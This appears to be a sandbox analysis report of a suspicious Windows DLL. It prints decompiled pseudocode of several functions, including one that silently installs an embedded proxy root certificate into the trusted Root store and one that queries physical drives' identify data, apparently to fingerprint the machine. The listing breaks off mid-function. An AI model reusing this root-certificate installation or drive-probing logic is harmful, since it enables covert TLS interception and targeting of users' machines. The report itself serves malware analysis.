                                                                                                                                                
                                                                                                                                                				_t3 = FreeLibrary(_a4); // executed
                                                                                                                                                				return _t3;
                                                                                                                                                			}




                                                                                                                                                0x1001aac7
                                                                                                                                                0x1001aace

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                • Opcode ID: 943a5e761fb49f706bd806fa478419eb7e3c1528e20f65d3e9a3f78506bcc702
                                                                                                                                                • Instruction ID: d41d78d4d80a0482e50fbcd51c543f3b4bec57f301915c91e4edb7b1fe7fc2cd
                                                                                                                                                • Opcode Fuzzy Hash: 943a5e761fb49f706bd806fa478419eb7e3c1528e20f65d3e9a3f78506bcc702
                                                                                                                                                • Instruction Fuzzy Hash: E3B0123100030CBBCE005BD8E8888C53B9C96085117004000F60C83100C630F44046E4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 68%
                                                                                                                                                			E1000EBD1(void* __ebx, void* __edi, void* __esi, void* __ebp, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                				void* _t5;
                                                                                                                                                				void* _t13;
                                                                                                                                                
                                                                                                                                                				E10015254();
                                                                                                                                                				_push(_a4);
                                                                                                                                                				_t5 = L1000EAD4(__ebx, _a12, _a8, __edi, __esi, _t13); // executed
                                                                                                                                                				return _t5;
                                                                                                                                                			}





                                                                                                                                                0x1000ebd1
                                                                                                                                                0x1000ebd6
                                                                                                                                                0x1000ebe2
                                                                                                                                                0x1000ebe8

                                                                                                                                                APIs
                                                                                                                                                • ___security_init_cookie.LIBCMT ref: 1000EBD1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ___security_init_cookie
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3657697845-0
                                                                                                                                                • Opcode ID: 435c711d617b55a71fb4d1b54f090de3e7e2be7afa2c94b8a1ac53afd156608b
                                                                                                                                                • Instruction ID: df3c7268351b8d96a0cbb6988288c15aabcc851e0dc57428b4f822f300cb22e6
                                                                                                                                                • Opcode Fuzzy Hash: 435c711d617b55a71fb4d1b54f090de3e7e2be7afa2c94b8a1ac53afd156608b
                                                                                                                                                • Instruction Fuzzy Hash: 9DB0483A208280AB9204CA10D84180EB3A2EBD9211F24C91DF4A61AA558B31AC64EA52
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 75%
                                                                                                                                                			E10004520(void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                                				signed char* _v56;
                                                                                                                                                				char _v128;
                                                                                                                                                				intOrPtr _v132;
                                                                                                                                                				void* _v136;
                                                                                                                                                				void* _v140;
                                                                                                                                                				void* _v144;
                                                                                                                                                				char* _v148;
                                                                                                                                                				char _v164;
                                                                                                                                                				intOrPtr _v168;
                                                                                                                                                				intOrPtr _v172;
                                                                                                                                                				intOrPtr _v176;
                                                                                                                                                				intOrPtr _v180;
                                                                                                                                                				char _v184;
                                                                                                                                                				char _v188;
                                                                                                                                                				char _v192;
                                                                                                                                                				intOrPtr _v196;
                                                                                                                                                				char _v200;
                                                                                                                                                				char _v204;
                                                                                                                                                				char _v208;
                                                                                                                                                				intOrPtr _v212;
                                                                                                                                                				char _v216;
                                                                                                                                                				char _v220;
                                                                                                                                                				void* __ebx;
                                                                                                                                                				void* __edi;
                                                                                                                                                				void* __esi;
                                                                                                                                                				intOrPtr _t55;
                                                                                                                                                				void* _t63;
                                                                                                                                                				void* _t70;
                                                                                                                                                				void* _t73;
                                                                                                                                                				intOrPtr* _t76;
                                                                                                                                                				intOrPtr _t86;
                                                                                                                                                				intOrPtr _t96;
                                                                                                                                                				void* _t97;
                                                                                                                                                				void* _t100;
                                                                                                                                                				void* _t102;
                                                                                                                                                
                                                                                                                                                				_t102 = __eflags;
                                                                                                                                                				_t55 = _a4;
                                                                                                                                                				_t96 = _a8;
                                                                                                                                                				_v184 = E10004490;
                                                                                                                                                				_v180 = E100044C0;
                                                                                                                                                				_v176 = _t55;
                                                                                                                                                				_v172 = _t55;
                                                                                                                                                				_v168 = _t96;
                                                                                                                                                				_t97 = 0;
                                                                                                                                                				E100071F0();
                                                                                                                                                				_v216 = E100046C0;
                                                                                                                                                				_v212 = E100046E0;
                                                                                                                                                				_v200 = E100046C0;
                                                                                                                                                				_v196 = E100046E0;
                                                                                                                                                				E10007530( &_v164, 0);
                                                                                                                                                				_v136 = 0;
                                                                                                                                                				_v136 = _v216( &_v216, _t96);
                                                                                                                                                				_v132 = _t96;
                                                                                                                                                				_v148 =  &_v184;
                                                                                                                                                				_v140 = 0;
                                                                                                                                                				_v144 = 0;
                                                                                                                                                				E100048A0(_t102,  &_v128);
                                                                                                                                                				_t63 = E10006FD0(__ebp, _t102,  &_v128,  &_v164,  &_v216,  &_v200);
                                                                                                                                                				_t100 =  &_v220 + 0x24;
                                                                                                                                                				if(_t63 == 0) {
                                                                                                                                                					_v204 = 0xffffffff;
                                                                                                                                                					_v208 = 0;
                                                                                                                                                					_v220 = 0;
                                                                                                                                                					_v192 = 0;
                                                                                                                                                					_v188 = 0;
                                                                                                                                                					if(( *_v56 & 0x00000080) == 0) {
                                                                                                                                                						_t70 = E10007010( &_v128,  &_v164, 0,  &_v204,  &_v208,  &_v220,  &_v192,  &_v188,  &_v216,  &_v200);
                                                                                                                                                						_t100 = _t100 + 0x28;
                                                                                                                                                						if(_t70 == 0) {
                                                                                                                                                							_t73 = VirtualAlloc(0, _v220 + 1, 0x3000, 4); // executed
                                                                                                                                                							_t97 = _t73;
                                                                                                                                                							if(_t97 != 0) {
                                                                                                                                                								_t76 = _a12;
                                                                                                                                                								_t107 = _t76;
                                                                                                                                                								_t86 = _v220;
                                                                                                                                                								if(_t76 != 0) {
                                                                                                                                                									 *_t76 = _t86;
                                                                                                                                                								}
                                                                                                                                                								E1000D190(0, _t96, _t97, _t97, _v208, _t86);
                                                                                                                                                								_t100 = _t100 + 0xc;
                                                                                                                                                								 *((char*)(_v220 + _t97)) = 0;
                                                                                                                                                							}
                                                                                                                                                							_v212( &_v216, _v208);
                                                                                                                                                							_t100 = _t100 + 8;
                                                                                                                                                						}
                                                                                                                                                					}
                                                                                                                                                				}
                                                                                                                                                				E100048E0(_t107,  &_v128,  &_v216);
                                                                                                                                                				return _t97;
                                                                                                                                                			}
                                                                                                                                                 Instruction listing: addresses 0x10004520 to 0x100046b4 (address column only; instruction text absent)

                                                                                                                                                APIs
                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 10004653
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                 • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                 • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                 • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                 • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                 • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                • Opcode ID: c2d35d8754308452533e96aa7c000d4ad4c917207e26cfb6ac4e1330ab019eeb
                                                                                                                                                • Instruction ID: 5f3268faf400ee4384dde952e7e6cf138bea3fab27ca3dfaa28aee59be70a859
                                                                                                                                                • Opcode Fuzzy Hash: c2d35d8754308452533e96aa7c000d4ad4c917207e26cfb6ac4e1330ab019eeb
                                                                                                                                                • Instruction Fuzzy Hash: BB4119B6408341AFD310CF55D88099BBBE8FBC8294F404E1EF59983255EB71E909CBA7
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E1001AB20(void* _a4, long _a8, long _a12) {
                                                                                                                                                				int _t5;
                                                                                                                                                
                                                                                                                                                				_t5 = VirtualFree(_a4, _a8, _a12); // executed
                                                                                                                                                				return _t5;
                                                                                                                                                			}
                                                                                                                                                 Instruction listing: addresses 0x1001ab2f and 0x1001ab36 (address column only; instruction text absent)

                                                                                                                                                APIs
                                                                                                                                                • VirtualFree.KERNELBASE(?,?,?), ref: 1001AB2F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                 • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                 • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                 • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                 • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                 • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FreeVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1263568516-0
                                                                                                                                                • Opcode ID: efa2235f1a2847ed0b6446073af2640c43a9e9fd204ca04507465df4fdaa2711
                                                                                                                                                • Instruction ID: c3865ccbcae920e215e079fb98926607579ac42653a45aa6abdb7f6c5b589da4
                                                                                                                                                • Opcode Fuzzy Hash: efa2235f1a2847ed0b6446073af2640c43a9e9fd204ca04507465df4fdaa2711
                                                                                                                                                • Instruction Fuzzy Hash: F4C04C7621420CABCB04DF98DCD4CAB77ADAB8CB10B10C508FB1D87200C634F9118BA4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Non-executed Functions

                                                                                                                                                C-Code - Quality: 52%
                                                                                                                                                			E1001F720(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                				int _v8;
                                                                                                                                                				int _v12;
                                                                                                                                                				char* _v16;
                                                                                                                                                				BYTE* _v20;
                                                                                                                                                				int _v24;
                                                                                                                                                				int _v28;
                                                                                                                                                				int _v32;
                                                                                                                                                				int _v36;
                                                                                                                                                				char _v299;
                                                                                                                                                				char _v300;
                                                                                                                                                				char _v563;
                                                                                                                                                				char _v564;
                                                                                                                                                				signed int _v568;
                                                                                                                                                				void* __ebp;
                                                                                                                                                				BYTE* _t66;
                                                                                                                                                				int _t69;
                                                                                                                                                				int _t70;
                                                                                                                                                				int _t71;
                                                                                                                                                				long _t72;
                                                                                                                                                				int _t75;
                                                                                                                                                				signed int _t90;
                                                                                                                                                				void* _t120;
                                                                                                                                                				void* _t121;
                                                                                                                                                				void* _t122;
                                                                                                                                                				void* _t123;
                                                                                                                                                				void* _t124;
                                                                                                                                                				void* _t127;
                                                                                                                                                
                                                                                                                                                				_t119 = __esi;
                                                                                                                                                				_t118 = __edi;
                                                                                                                                                				_t91 = __ebx;
                                                                                                                                                 				_v16 = "-----BEGIN CERTIFICATE-----\nMIIFTDCCBDSgAwIBAgIGAW3jTP9iMA0GCSqGSIb3DQEBCwUAMIGqMTswOQYDVQQD\nDDJDaGFybGVzIFByb3h5IENBICgxOSDljYHmnIggMjAxOSwgREVTS1RPUC1CTkFU\nMTFVKTElMCMGA1UECwwcaHR0cHM6Ly9jaGFybGVzcHJveHkuY29tL3NzbDERMA8G\nA1UECgwIWEs3MiBMdGQxETAPBgNVBAcMCEF1Y2tsYW5kMREwDwYDVQQIDAhBdWNr\nbGFuZDELMAkGA1UEBhMCTlowHhcNMDAwMTAxMDAwMDAwWhcNNDgxMjE1MDkxNTM3\nWjCBqjE7MDkGA1UEAwwyQ2hhcmxlcyBQcm94eSBDQSAoMTkg5Y2B5pyIIDIwMTks\nIERFU0tUT1AtQk5BVDExVSkxJTAjBgNVBAsMHGh0dHBzOi8vY2hhcmxlc3Byb3h5\nLmNvbS9zc2wxETAPBgNVBAoMCFhLNzIgTHRkMREwDwYDVQQHDAhBdWNrbGFuZDER\nMA8GA1UECAwIQXVja2xhbmQxCzAJBgNVBAYTAk5aMIIBIjANBgkqhkiG9w0BAQEF\nAAOCAQ8AMIIBCgKCAQEArobFBD7TTZn0T6MFLqNAR6f7vjMYix3CymRcoySeheVL\nSSHUmY/aaiIkfDLZCH10KvO/hQgDroweJfqtU/uP2CO3NT2aOsmSv5F/aTgmx5Dl\nOlQLEgtlU1COyVheRn0xC9Pvn7YXMd61Iut49D+CSzS+Nngtt6jLFizSIkexTkxa\n5jPtZlQjVKWZcb3cWRYOzcUhtEd8k8qeYk4K8AKYYCMA9dw2iBnDy58CYEY2iIJ2\ns6SYVwRztTKLCDTzJ8NCheMz2pIH4S8O27ZUyM8R48x8uhelLNfNQsEK4JWi5Oud\nPj82FIgkPwWEr0DnLW5uGCFJv7g0I4T2DxLhRzQljQIDAQABo4IBdDCCAXAwDwYD\nVR0TAQH/BAUwAwEB/zCCASwGCWCGSAGG+EIBDQSCAR0TggEZVGhpcyBSb290IGNl\ncnRpZmljYXRlIHdhcyBnZW5lcmF0ZWQgYnkgQ2hhcmxlcyBQcm94eSBmb3IgU1NM\nIFByb3h5aW5nLiBJZiB0aGlzIGNlcnRpZmljYXRlIGlzIHBhcnQgb2YgYSBjZXJ0\naWZpY2F0ZSBjaGFpbiwgdGhpcyBtZWFucyB0aGF0IHlvdSdyZSBicm93c2luZyB0\naHJvdWdoIENoYXJsZXMgUHJveHkgd2l0aCBTU0wgUHJveHlpbmcgZW5hYmxlZCBm\nb3IgdGhpcyB3ZWJzaXRlLiBQbGVhc2Ugc2VlIGh0dHA6Ly9jaGFybGVzcHJveHku\nY29tL3NzbCBmb3IgbW9yZSBpbmZvcm1hdGlvbi4wDgYDVR0PAQH/BAQDAgIEMB0G\nA1UdDgQWBBT40NxUNnz3lAIPi5J4Ol2KkSUfnzANBgkqhkiG9w0BAQsFAAOCAQEA\nZiJx651cdEyIOC3pi6NzIOYxIQTQQnOpIAeoZwl21lMOY0fQC73tExm7Z1TzYjdZ\nYJWSKRHjZhpwNU9roLeXp2JYvnreu4yNvu7Zd3YLgCcddLJETZL2wTN6N5tzVFsl\nHeX4gSuWJau7+u3BX4xsN0ubJt0P7wNRhfWJnYgZ5oncbbXwurv9Y3xSsb7IARW4\nifru1JPUES10SVStOr5mB8QaSi1le6Mw7RMfpOjCW7KO4YHc742pHBe/0wojyOro\nGxUu2F/5OK/DKzT/2v+9ty2bsEBnv8h/V566ljexZeoAjqdAi8gmXzPAOb9g9QbS\nRaa1MBevyOFh1w7VsNdldg==\n-----END CERTIFICATE-----\n";
                                                                                                                                                				_v24 = 0;
                                                                                                                                                				_v8 = 0;
                                                                                                                                                				_v28 = 0;
                                                                                                                                                				_v12 = 0;
                                                                                                                                                				if(CryptStringToBinaryA(_v16, 0, 0, 0,  &_v12, 0, 0) != 0 && _v12 > 0) {
                                                                                                                                                					_t66 = L1000CE56(__ebx, _v12, __edi, __esi, _v12);
                                                                                                                                                					_t122 = _t121 + 4;
                                                                                                                                                					_v20 = _t66;
                                                                                                                                                					_t133 = _v20;
                                                                                                                                                					if(_v20 != 0) {
                                                                                                                                                						CryptStringToBinaryA(_v16, 0, 0, _v20,  &_v12, 0, 0);
                                                                                                                                                						_t69 = _v12;
                                                                                                                                                						__imp__CertCreateCertificateContext(1, _v20, _t69);
                                                                                                                                                						_v8 = _t69;
                                                                                                                                                						_push(_v20);
                                                                                                                                                						_t70 = E1000CA30(__ebx, __edi, __esi, _t133);
                                                                                                                                                						_t123 = _t122 + 4;
                                                                                                                                                						if(_v8 != 0) {
                                                                                                                                                							__imp__CertOpenStore(0xa, 0, 0, 0x24000, L"Root");
                                                                                                                                                							_v28 = _t70;
                                                                                                                                                							if(_v28 != 0) {
                                                                                                                                                								_t71 = _v8;
                                                                                                                                                								__imp__CertAddCertificateContextToStore(_v28, _t71, 1, 0);
                                                                                                                                                								if(_t71 == 0) {
                                                                                                                                                									_t72 = GetLastError();
                                                                                                                                                									__eflags = _t72 - 0x80092005;
                                                                                                                                                									if(_t72 == 0x80092005) {
                                                                                                                                                										_v36 = 0;
                                                                                                                                                										_v32 = 0;
                                                                                                                                                										__imp__CertGetCertificateContextProperty(_v8, 3, 0,  &_v36);
                                                                                                                                                										__eflags = _v36;
                                                                                                                                                										if(_v36 > 0) {
                                                                                                                                                											_t75 = L1000CE56(__ebx,  &_v36, __edi, __esi, _v36 + 1);
                                                                                                                                                											_t124 = _t123 + 4;
                                                                                                                                                											_v32 = _t75;
                                                                                                                                                											__eflags = _v32;
                                                                                                                                                											if(_v32 != 0) {
                                                                                                                                                												E1000CF20(_t118, _v32, 0, _v36 + 1);
                                                                                                                                                												__imp__CertGetCertificateContextProperty(_v8, 3, _v32,  &_v36);
                                                                                                                                                												_v564 = 0;
                                                                                                                                                												E1000CF20(_t118,  &_v563, 0, 0x103);
                                                                                                                                                												_v300 = 0;
                                                                                                                                                												E1000CF20(_t118,  &_v299, 0, 0x103);
                                                                                                                                                												_t127 = _t124 + 0x24;
                                                                                                                                                												_v568 = 0;
                                                                                                                                                												while(1) {
                                                                                                                                                													__eflags = _v568 - _v36;
                                                                                                                                                													if(_v568 >= _v36) {
                                                                                                                                                														break;
                                                                                                                                                													}
                                                                                                                                                													E1000CC93(_t118, _t120 + _v568 * 2 - 0x128, "%02X",  *(_v32 + _v568) & 0x000000ff);
                                                                                                                                                													_t127 = _t127 + 0xc;
                                                                                                                                                													_t90 = _v568 + 1;
                                                                                                                                                													__eflags = _t90;
                                                                                                                                                													_v568 = _t90;
                                                                                                                                                												}
                                                                                                                                                												E1000CC93(_t118,  &_v564, "Software\\Microsoft\\SystemCertificates\\Root\\Certificates\\%s",  &_v300);
                                                                                                                                                												_v24 = E1001F680(_a8, __eflags, 0x80000002,  &_v564, _a4, _a8);
                                                                                                                                                												_push(_v32);
                                                                                                                                                												E1000CA30(_t91, _t118, _t119, __eflags);
                                                                                                                                                											}
                                                                                                                                                										}
                                                                                                                                                									}
                                                                                                                                                								} else {
                                                                                                                                                									_v24 = 1;
                                                                                                                                                								}
                                                                                                                                                								__imp__CertCloseStore(_v28, 1);
                                                                                                                                                							}
                                                                                                                                                							__imp__CertFreeCertificateContext(_v8);
                                                                                                                                                						}
                                                                                                                                                					}
                                                                                                                                                				}
                                                                                                                                                				return _v24;
                                                                                                                                                			}
                                                                                                                                                Address range of the listing above: 0x1001f720 to 0x1001f988

                                                                                                                                                APIs
                                                                                                                                                • CryptStringToBinaryA.CRYPT32(10025F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F75E
                                                                                                                                                • CryptStringToBinaryA.CRYPT32(10025F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F7A3
                                                                                                                                                • CertCreateCertificateContext.CRYPT32(00000001,00000000,00000000), ref: 1001F7B3
                                                                                                                                                  • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                  • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                  • Part of subcall function 1000CA30: RtlFreeHeap.NTDLL(00000000,?,103301D0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                  • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301D0), ref: 1000CAA9
                                                                                                                                                • CertOpenStore.CRYPT32(0000000A,00000000,00000000,00024000,Root), ref: 1001F7E2
                                                                                                                                                • CertAddCertificateContextToStore.CRYPT32(00000000,00000000,00000001,00000000), ref: 1001F801
                                                                                                                                                • GetLastError.KERNEL32 ref: 1001F817
                                                                                                                                                • CertGetCertificateContextProperty.CRYPT32(00000000,00000003,00000000,00000000), ref: 1001F842
                                                                                                                                                • _memset.LIBCMT ref: 1001F87B
                                                                                                                                                • CertGetCertificateContextProperty.CRYPT32(00000000,00000003,00000000,00000000), ref: 1001F891
                                                                                                                                                • _memset.LIBCMT ref: 1001F8AC
                                                                                                                                                • _memset.LIBCMT ref: 1001F8C9
                                                                                                                                                • _sprintf.LIBCMT ref: 1001F91C
                                                                                                                                                • _sprintf.LIBCMT ref: 1001F939
                                                                                                                                                • CertCloseStore.CRYPT32(00000000,00000001), ref: 1001F972
                                                                                                                                                • CertFreeCertificateContext.CRYPT32(00000000), ref: 1001F97C
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
• Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
• Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: Cert$CertificateContext$Store_memset$BinaryCryptErrorFreeLastPropertyString_sprintf$CloseCreateHeapOpen___sbh_find_block___sbh_free_block
• String ID: %02X$Root$Software\Microsoft\SystemCertificates\Root\Certificates\%s
• API String ID: 3311258246-1857994723
• Opcode ID: 5ddfbb8f852ddff57fa1320fe1c9e70ac928a395fe8b92145bd73a5c7497c889
• Instruction ID: afe3fe35dc8e16d3553f6fe7244bb1c21b11eefa07642306de8368dfec16bcca
• Opcode Fuzzy Hash: 5ddfbb8f852ddff57fa1320fe1c9e70ac928a395fe8b92145bd73a5c7497c889
• Instruction Fuzzy Hash: 986133B5D00219BBEB10DB90CC99FFEB778EB48704F104598F605BA280D775AA85CFA5
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 85%
	E1001D7E0(void* __edi, intOrPtr _a4) {
		char _v8;
		void* _v12;
		void* _v16;
		void* _v20;
		void* _v24;
		void* _v28;
		void* _v32;
		void* _v36;
		void* _v40;
		signed short* _v44;
		void* _v48;
		intOrPtr _v52;
		intOrPtr _v56;
		signed int* _v60;
		char _v570;
		short _v572;
		char _v1596;
		void* _v1600;
		char _v1604;
		long _v1608;
		signed int _v1612;
		void* _v1616;
		void* _v1620;
		void* _v1624;
		void* _v1628;
		void* _v1632;
		signed int _v1633;
		void _v1636;
		char _v2148;
		char _v2164;
		void* _t88;
		void* _t94;
		void* _t123;
		void* _t124;

		_t123 = __edi;
		_v52 = _a4;
		if(_a4 == 0) {
			L18:
			return 0;
		}
		_v1600 = 0;
		_v1612 = 0;
		/* Probe \\.\PhysicalDrive0 .. \\.\PhysicalDrive3 in turn (_v1612 is the drive index). */
		while(1 != 0) {
			_v572 = 0;
			E1000CF20(_t123,  &_v570, 0, 0x1fe);
			wsprintfW( &_v572, L"\\\\.\\PhysicalDrive%d", _v1612);
			_t124 = _t124 + 0x18;
			/* GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, OPEN_EXISTING */
			_v48 = CreateFileW( &_v572, 0xc0000000, 3, 0, 3, 0, 0);
			if(_v48 == 0xffffffff) {
				L15:
				_v1612 = 1 + _v1612;
				if(_v1612 < 4) {
					continue;
				}
				return _v1600;
			}
			_v1608 = 0;
			_v1636 = 0;
			_v1632 = 0;
			_v1628 = 0;
			_v1624 = 0;
			_v1620 = 0;
			_v1616 = 0;
			/* 0x74080 == SMART_GET_VERSION (winioctl.h); the 0x18-byte output at &_v1636 is a GETVERSIONINPARAMS. */
			if(DeviceIoControl(_v48, 0x74080, 0, 0,  &_v1636, 0x18,  &_v1608, 0) == 0) {
				CloseHandle(_v48);
				goto L15;
			}
			/* _v1633 is byte 3 of GETVERSIONINPARAMS, i.e. bIDEDeviceMap; zero means no ATA/ATAPI device was reported. */
			if((_v1633 & 0x000000ff) == 0) {
				L11:
				CloseHandle(_v48);
				if(_v1600 == 0) {
					goto L15;
				}
				return _v1600;
			}
			/* Bits 4..7 of bIDEDeviceMap flag ATAPI devices: pick IDENTIFY PACKET DEVICE (0xa1) if
			   this drive's ATAPI bit is set, otherwise ATA IDENTIFY DEVICE (0xec). */
			asm("sbb edx, edx");
			_v1604 = ( ~((_v1633 & 0x000000ff) >> _v1612 & 0x00000010) & 0xffffffb5) + 0xec;
			_v40 = 0;
			_v36 = 0;
			_v32 = 0;
			_v28 = 0;
			_v24 = 0;
			_v20 = 0;
			_v16 = 0;
			_v12 = 0;
			_v8 = 0;
			E1000CF20(_t123,  &_v2164, 0, 0x210);
			/* Helper not shown in this report; it receives the drive handle, index, identify command
			   and a 0x210-byte output buffer, which is consistent with reading the drive's IDENTIFY data. */
			_t88 = E1001CF20( &_v40, _v1612, _v48,  &_v2164, _v1604,  &_v1608);
			_t124 = _t124 + 0x24;
			if(_t88 == 0) {
				goto L11;
			}
			/* Widen the 16-bit words of the returned buffer into an int array. */
			_v60 =  &_v1596;
			_v44 =  &_v2148;
			do {
				 *_v60 =  *_v44 & 0x0000ffff;
				_v44 =  &(_v44[1]);
				_v60 =  &(_v60[1]);
			} while (_v44 <  &_v1636);
			/* Helpers not shown here: the converted buffer is compared (up to 0x104 units) against the
			   caller's argument _a4; a return of 0 is treated as a match and _v1600 is set to 1. */
			_v56 = E1001CD70( &_v1596);
			_t94 = E1001CFA0(_v56, 0x104, _v52);
			_t124 = _t124 + 0x10;
			if(_t94 == 0) {
				_v1600 = 1;
			}
			goto L11;
		}
		goto L18;
	}

APIs
• _memset.LIBCMT ref: 1001D831
• wsprintfW.USER32 ref: 1001D84C
• CreateFileW.KERNEL32(00000000,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 1001D86B
• DeviceIoControl.KERNEL32 ref: 1001D8E3
• _memset.LIBCMT ref: 1001D96F
• CloseHandle.KERNEL32(000000FF), ref: 1001DA1A
• CloseHandle.KERNEL32(000000FF), ref: 1001DA37
Strings
Memory Dump Source
• Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
• Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
• Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseHandle_memset$ControlCreateDeviceFilewsprintf
                                                                                                                                                • String ID: \\.\PhysicalDrive%d
                                                                                                                                                • API String ID: 381188756-2935326385
                                                                                                                                                • Opcode ID: 228ac608f1b5d7182a6ce1183333a69992f212d465b9132994bd91ad4db78590
                                                                                                                                                • Instruction ID: e843174948dd7abc5fb59b2edd762e96836351ae516af004f3d86572885adcf9
                                                                                                                                                • Opcode Fuzzy Hash: 228ac608f1b5d7182a6ce1183333a69992f212d465b9132994bd91ad4db78590
                                                                                                                                                • Instruction Fuzzy Hash: 21613DB1D04218ABEB20DF54CC95BDDB7B6EF84304F148199E509BB280D776AA94CF91
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 82%
                                                                                                                                                			E1001DA70(void* __edi, intOrPtr _a4) {
                                                                                                                                                				struct _OVERLAPPED* _v8;
                                                                                                                                                				struct _OVERLAPPED* _v12;
                                                                                                                                                				void* _v16;
                                                                                                                                                				short _v532;
                                                                                                                                                				struct _OVERLAPPED* _v536;
                                                                                                                                                				struct _OVERLAPPED* _v540;
                                                                                                                                                				void _v544;
                                                                                                                                                				long _v548;
                                                                                                                                                				struct _OVERLAPPED* _v552;
                                                                                                                                                				intOrPtr _v10532;
                                                                                                                                                				void _v10556;
                                                                                                                                                				char _v11556;
                                                                                                                                                				void* _t56;
                                                                                                                                                				void* _t70;
                                                                                                                                                				void* _t71;
                                                                                                                                                
                                                                                                                                                				_t70 = __edi;
                                                                                                                                                				E10018AA0(0x2d20);
                                                                                                                                                				if(_a4 == 0) {
                                                                                                                                                					L13:
                                                                                                                                                					return 0;
                                                                                                                                                				}
                                                                                                                                                				_v8 = 0;
                                                                                                                                                				_v12 = 0;
                                                                                                                                                				_v552 = 0;
                                                                                                                                                				while(1 != 0) {
